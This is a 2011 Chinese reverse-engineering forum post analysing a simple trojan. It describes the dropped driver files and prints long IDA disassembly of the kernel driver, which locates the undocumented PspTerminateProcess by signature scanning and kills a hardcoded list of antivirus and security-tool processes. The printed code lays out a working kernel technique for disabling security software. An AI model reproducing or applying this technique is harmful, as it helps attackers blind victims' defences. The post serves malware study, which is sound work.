作 者: Hacksign
時 間: 2011-08-02,12:04:51
鏈接: http://bbs.pediy.com/showthread.php?t=138107
昨天發了一篇被判定為YJ貼了。 。 ,希望這篇不會。 。 。
馬比較簡單,適合新手。
先說一下行為:exe文件會釋放Pcix32.sys amd32_.sys atax32.sys三個文件,但是後兩個其實只是地一個的拷貝。 sys文件負責監控各種殺毒軟件和安全工具的啟動,一旦發現,馬上kill。
1。 exe行為。
這裡只寫思路,詳細請參考idb文件和自己跟,嘎嘎。
首先獲取系統drivers目錄,然後釋放Pcix32.sys到這個目錄下,期間拷貝各種副本。
還有,exe會檢測是否有還原精靈,有的話會做相應處理,不過本人太懶。 。懶得搭環境,這部分有興趣的跟一下吧:)
如果沒有還原精靈的話,就加載驅動。
最後有一個注入的行為,也沒仔細跟:D
2。 sys
這個是感興趣的,貼代碼:
代碼:
.text:00010B34 lea eax, [ebp+SystemInformation]
.text:00010B37 push eax ; ReturnLength
.text:00010B38 push 0 ; SystemInformationLength
.text:00010B3A push eax ; SystemInformation
.text:00010B3B push 0Bh ; SystemInformationClass
.text:00010B3D mov edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43 call edi ; __imp_ZwQuerySystemInformation
.text:00010B45 push [ebp+SystemInformation] ; NumberOfBytes
.text:00010B48 push 1 ; PoolType
.text:00010B4A call ds:ExAllocatePool
獲得系統各種信息。 。 。
代碼:
text:00010B5A push 0 ; ReturnLength
.text:00010B5C push [ebp+SystemInformation] ; SystemInformationLength
.text:00010B5F push esi ; SystemInformation
.text:00010B60 push 0Bh ; SystemInformationClass
.text:00010B62 call edi ; __imp_ZwQuerySystemInformation
.text:00010B64 test eax, eax
.text:00010B66 jl short loc_10BDE
.text:00010B68 mov ebx, [esi+0Ch]
.text:00010B6B mov edi, [esi+10h]
.text:00010B6E add edi, ebx
.text:00010B70 push 0 ; Tag
.text:00010B72 push esi ; P
.text:00010B73 call ds:ExFreePoolWithTag
.text:00010B79 mov esi, ebx
.text:00010B7B
.text:00010B7B loc_10B7B: ; CODE XREF: sub_10B28+BF?j
.text:00010B7B cmp esi, edi
.text:00010B7D ja short loc_10BDE
.text:00010B7F push esi ; VirtualAddress
.text:00010B80 call ds:MmIsAddressValid
.text:00010B86 test al, al
.text:00010B88 jz short loc_10BE6
.text:00010B8A lea ebx, [esi+4]
.text:00010B8D push ebx ; VirtualAddress
.text:00010B8E call ds:MmIsAddressValid;測試地址是否可用,防止BSOD。 。 。
.text:00010B94 test al, al
.text:00010B96 jz short loc_10BE6
.text:00010B98 mov eax, 8B55FF8Bh:google一下這個值吧,發現是PspTerminateProcess
.text:00010B9D cmp [esi], eax
.text:00010B9F jnz short loc_10BE6
.text:00010BA1 mov eax, 0CEC83ECh
.text:00010BA6 cmp [ebx], eax
.text:00010BA8 jnz short loc_10BE6
.text:00010BAA mov eax, 0FFF84D83h
.text:00010BAF cmp [esi+8], eax
.text:00010BB2 jnz short loc_10BE6
.text:00010BB4 mov eax, 7D8B5756h
.text:00010BB9 cmp [esi+0Ch], eax
.text:00010BBC jnz short loc_10BE6
.text:00010BBE and [ebp+ms_exc.disabled], 0
.text:00010BC2 mov [ebp+var_20], esi
.text:00010BC5 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC mov eax, esi;保存函數地址
作者考慮的還挺周全。 。 。如果木有找到這個函數:
代碼:
.text:00010A40 call _GetPspTerminateProcessAddress
.text:00010A45 mov PspTerminateProcess, eax
.text:00010A4A test eax, eax
.text:00010A4C jnz short loc_10A8F
.text:00010A4E call sub_10568
就去找PsTerminateProcess這個東東:
代碼:
sub_10568 proc near ; CODE XREF: sub_10A30+1E?p
.text:00010568 push offset aPsterminatesys ; "PsTerminateSystemThread"
.text:0001056D push sysInfo
.text:00010573 call sub_10486
.text:00010578 xor ecx, ecx
.text:0001057A
.text:0001057A loc_1057A: ; CODE XREF: sub_10568+28?j
.text:0001057A cmp byte ptr [eax], 0FFh;0xFF7508,即psterminateprocess
.text:0001057D jnz short loc_1058B
.text:0001057F cmp byte ptr [eax+1], 75h
.text:00010583 jnz short loc_1058B
.text:00010585 cmp byte ptr [eax+2], 8
.text:00010589 jz short loc_10595
。 。 。 。
.text:00010595 loc_10595: ; CODE XREF: sub_10568+21?j
.text:00010595 add eax, 5
.text:00010598 mov ecx, [eax]
.text:0001059A lea eax, [ecx+eax+4]
.text:0001059E retn
期間還有兩個函數,時間倉促,沒細看,就不說了。 。 。 。
下面是find and kill函數,負責幹壞事的元兇:
代碼:
.text:00010CEC mov edi, edi
.text:00010CEE push ebp
.text:00010CEF mov ebp, esp
.text:00010CF1 sub esp, 6A4h
.text:00010CF7 and [ebp+var_C], 0
.text:00010CFB push ebx
.text:00010CFC push esi
.text:00010CFD push edi
.text:00010CFE mov esi, 0FFFFh
.text:00010D03 push esi ; NumberOfBytes
.text:00010D04 mov ebx, offset aKvmonxp_exe ; "KVMonXp.exe"
.text:00010D09 push 1 ; PoolType
.text:00010D0B mov [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15 mov [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F mov [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29 mov [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33 mov [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D mov [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47 mov [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51 mov [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B mov [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65 mov [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F mov [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79 mov [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83 mov [ebp+var_94], offset a3_0 ; "3"
.text:00010D8D mov [ebp+var_90], offset aO ; "O"
.text:00010D97 mov [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1 mov [ebp+var_88], offset aK_8 ; "K"
.text:00010DAB mov [ebp+var_84], offset aK_7 ; "k"
.text:00010DB5 mov [ebp+var_80], offset aK_6 ; "k"
.text:00010DBC mov [ebp+var_7C], offset aK_5 ; "k"
.text:00010DC3 mov [ebp+var_78], offset aK_4 ; "k"
.text:00010DCA mov [ebp+var_74], offset aU ; "u"
.text:00010DD1 mov [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8 mov [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF mov [ebp+var_68], offset aK_3 ; "K"
.text:00010DE6 mov [ebp+var_64], offset aK ; "K"
.text:00010DED mov [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4 mov [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB mov [ebp+var_58], offset aR_3 ; "R"
.text:00010E02 mov [ebp+var_54], offset aR ; "R"
.text:00010E09 mov [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10 mov [ebp+var_4C], offset aR_0 ; "R"
.text:00010E17 mov [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E mov [ebp+var_44], offset aRav_exe ; "Rav.exe"
.text:00010E25 mov [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C mov [ebp+var_3C], offset word_119F2
.text:00010E33 mov [ebp+var_38], ebx
.text:00010E36 mov [ebp+var_34], offset aA ; "a"
.text:00010E3D mov [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44 mov [ebp+var_2C], offset aS_0 ; "S"
.text:00010E4B mov [ebp+var_28], offset aR_1 ; "r"
.text:00010E52 mov [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59 mov [ebp+var_20], offset aR_2 ; "r"
.text:00010E60 mov [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67 mov [ebp+var_18], offset aK_2 ; "k"
.text:00010E6E mov [ebp+var_14], offset aK_1 ; "k"
.text:00010E75 mov [ebp+var_10], offset aK_0 ; "k"
.text:00010E7C call ds:ExAllocatePool
.text:00010E82 mov edi, eax
.text:00010E84 mov [ebp+P], edi
.text:00010E87 test edi, edi
.text:00010E89 jz loc_10FA5
.text:00010E8F push offset Format ; "enter findprocessandkill\n"
.text:00010E94 call DbgPrint
.text:00010E99 pop ecx
.text:00010E9A lea eax, [ebp+ReturnLength]
.text:00010E9D push eax ; ReturnLength
.text:00010E9E push esi ; SystemInformationLength
.text:00010E9F push edi ; SystemInformation
.text:00010EA0 push 5 ; SystemInformationClass
.text:00010EA2 call ds:__imp_ZwQuerySystemInformation
.text:00010EA8 mov esi, edi
.text:00010EAA
.text:00010EAA loc_10EAA: ; CODE XREF: _FindAddKillProcess+2A8?j
.text:00010EAA add esi, [esi]
.text:00010EAC xor eax, eax
.text:00010EAE lea edi, [esi+38h]
.text:00010EB1 cmp [edi], ax
.text:00010EB4 jz loc_10F91
.text:00010EBA mov [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD loc_10EBD: ; CODE XREF: _FindAddKillProcess+29F?j
.text:00010EBD push [ebp+eax*4+SourceString] ; SourceString
.text:00010EC4 lea eax, [ebp+eax*8+DestinationString]
.text:00010ECB push eax ; DestinationString
.text:00010ECC call ds:RtlInitUnicodeString
.text:00010ED2 mov eax, [ebp+ReturnLength]
.text:00010ED5 push 1 ; CaseInSensitive
.text:00010ED7 lea eax, [ebp+eax*8+DestinationString]
.text:00010EDE push eax ; String2
.text:00010EDF push edi ; String1
.text:00010EE0 call ds:RtlCompareUnicodeString
.text:00010EE6 test eax, eax
.text:00010EE8 jnz loc_10F7C
.text:00010EEE mov eax, [ebp+ReturnLength]
.text:00010EF1 push offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010EF6 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010EFD call ds:_wcsicmp
.text:00010F03 pop ecx
.text:00010F04 pop ecx
.text:00010F05 test eax, eax
.text:00010F07 jz short loc_10F75
.text:00010F09 mov eax, [ebp+ReturnLength]
.text:00010F0C push offset word_119F2 ; wchar_t *
.text:00010F11 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F18 call ds:_wcsicmp
.text:00010F1E pop ecx
.text:00010F1F pop ecx
.text:00010F20 test eax, eax
.text:00010F22 jz short loc_10F75
.text:00010F24 mov eax, [ebp+ReturnLength]
.text:00010F27 push ebx ; wchar_t *
.text:00010F28 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F2F call ds:_wcsicmp
.text:00010F35 pop ecx
.text:00010F36 pop ecx
.text:00010F37 test eax, eax
.text:00010F39 jz short loc_10F75
.text:00010F3B mov eax, [ebp+ReturnLength]
.text:00010F3E push [ebp+eax*4+SourceString]
.text:00010F45 push offset aFindProcesssWs ; "Find Processs: %ws\n"
.text:00010F4A call DbgPrint
.text:00010F4F pop ecx
.text:00010F50 pop ecx
.text:00010F51 push dword ptr [esi+44h] ; PEPROCESS
.text:00010F54 call KillProcess
.text:00010F59 test eax, eax
.text:00010F5B jl short loc_10F7C
.text:00010F5D mov eax, [ebp+ReturnLength]
.text:00010F60 push [ebp+eax*4+SourceString]
.text:00010F67 push offset aKillProcesssWs ; "Kill Processs: %ws OK!\n"
.text:00010F6C call DbgPrint
.text:00010F71 pop ecx
.text:00010F72 pop ecx
.text:00010F73 jmp short loc_10F7C
.text:00010F75 ; --------------------------------------------- ------------------------------
.text:00010F75
.text:00010F75 loc_10F75: ; CODE XREF: _FindAddKillProcess+21B?j
.text:00010F75 ; _FindAddKillProcess+236?j ...
.text:00010F75 mov byte_1212C, 1
.text:00010F7C
.text:00010F7C loc_10F7C: ; CODE XREF: _FindAddKillProcess+1FC?j
.text:00010F7C ; _FindAddKillProcess+26F?j ...
.text:00010F7C mov eax, [ebp+ReturnLength]
.text:00010F7F inc eax
.text:00010F80 cmp [ebp+eax*4+SourceString], 0
.text:00010F88 mov [ebp+ReturnLength], eax
.text:00010F8B jnz loc_10EBD
.text:00010F91
.text:00010F91 loc_10F91: ; CODE XREF: _FindAddKillProcess+1C8?j
.text:00010F91 cmp dword ptr [esi], 0
.text:00010F94 jnz loc_10EAA
.text:00010F9A push 0 ; Tag
.text:00010F9C push [ebp+P] ; P
.text:00010F9F call ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5 loc_10FA5: ; CODE XREF: _FindAddKillProcess+19D?j
.text:00010FA5 pop edi
.text:00010FA6 pop esi
.text:00010FA7 pop ebx
.text:00010FA8 leave
.text:00010FA9 retn
循環查找一堆安全工具,發現就kill~
呵呵,看一下怎麼kill的吧:
代碼:
KillProcess proc near ; CODE XREF: _FindAddKillProcess+268?p
.text:00010CB0
.text:00010CB0 PEPROCESS = dword ptr 8
.text:00010CB0
.text:00010CB0 mov edi, edi
.text:00010CB2 push ebp
.text:00010CB3 mov ebp, esp
.text:00010CB5 lea eax, [ebp+PEPROCESS]
.text:00010CB8 push eax
.text:00010CB9 push [ebp+PEPROCESS]
.text:00010CBC call PsLookupProcessByProcessId
.text:00010CC1 test eax, eax
.text:00010CC3 jl short loc_10CCE
.text:00010CC5 mov ecx, [ebp+PEPROCESS] ; Object
.text:00010CC8 call ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE loc_10CCE: ; CODE XREF: KillProcess+13?j
.text:00010CCE push [ebp+PEPROCESS]
.text:00010CD1 call sub_10C4E
.text:00010CD6 test eax, eax
.text:00010CD8 jl short loc_10CDE
.text:00010CDA xor eax, eax
.text:00010CDC jmp short loc_10CE3
.text:00010CDE ; --------------------------------------------- ------------------------------
.text:00010CDE
.text:00010CDE loc_10CDE: ; CODE XREF: KillProcess+28?j
.text:00010CDE mov eax, 0C0000001h
.text:00010CE3
.text:00010CE3 loc_10CE3: ; CODE XREF: KillProcess+2C?j
.text:00010CE3 pop ebp
.text:00010CE4 retn 4
.text:00010CE4 KillProcess endp
然後是00010CD1的調用:
代碼:
.text:00010C50 push offset unk_12088
.text:00010C55 call __SEH_prolog4
.text:00010C5A xor edi, edi
.text:00010C5C mov [ebp+var_1C], edi
.text:00010C5F mov [ebp+ms_exc.disabled], edi
.text:00010C62 push edi ; Object
.text:00010C63
.text:00010C63 loc_10C63: ; CODE XREF: sub_10C4E+32?j
.text:00010C63 push [ebp+PEPROCESS] ; PEPROCESS
.text:00010C66 call sub_10BEE
.text:00010C6B mov esi, eax
.text:00010C6D cmp esi, edi
.text:00010C6F jz short loc_10C99
.text:00010C71 mov [ebp+var_1C], edi
.text:00010C74 push edi
.text:00010C75 push esi
.text:00010C76 call PspTerminateProcess
.text:00010C7C mov [ebp+var_1C], eax
.text:00010C7F push esi
.text:00010C80 jmp short loc_10C63
.text:00010C82 ; --------------------------------------------- ------------------------------
.text:00010C82
.text:00010C82 loc_10C82: ; DATA XREF: .rdata:0001209C?o
.text:00010C82 mov eax, [ebp+ms_exc.exc_ptr]
.text:00010C85 mov eax, [eax]
.text:00010C87 mov eax, [eax]
.text:00010C89 mov [ebp+var_20], eax
.text:00010C8C xor eax, eax
.text:00010C8E inc eax
.text:00010C8F retn
.text:00010C90 ; --------------------------------------------- ------------------------------
.text:00010C90
.text:00010C90 loc_10C90: ; DATA XREF: .rdata:000120A0?o
.text:00010C90 mov esp, [ebp+ms_exc.old_esp]
.text:00010C93 mov eax, [ebp+var_20]
.text:00010C96 mov [ebp+var_1C], eax
.text:00010C99
.text:00010C99 loc_10C99: ; CODE XREF: sub_10C4E+21?j
.text:00010C99 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0 mov eax, [ebp+var_1C]
.text:00010CA3 call __SEH_epilog4
.text:00010CA8 retn 4
.text:00010CA8 sub_10C4E endp
先到這裡吧。 。寫的有點簡略,大家見諒。 。 。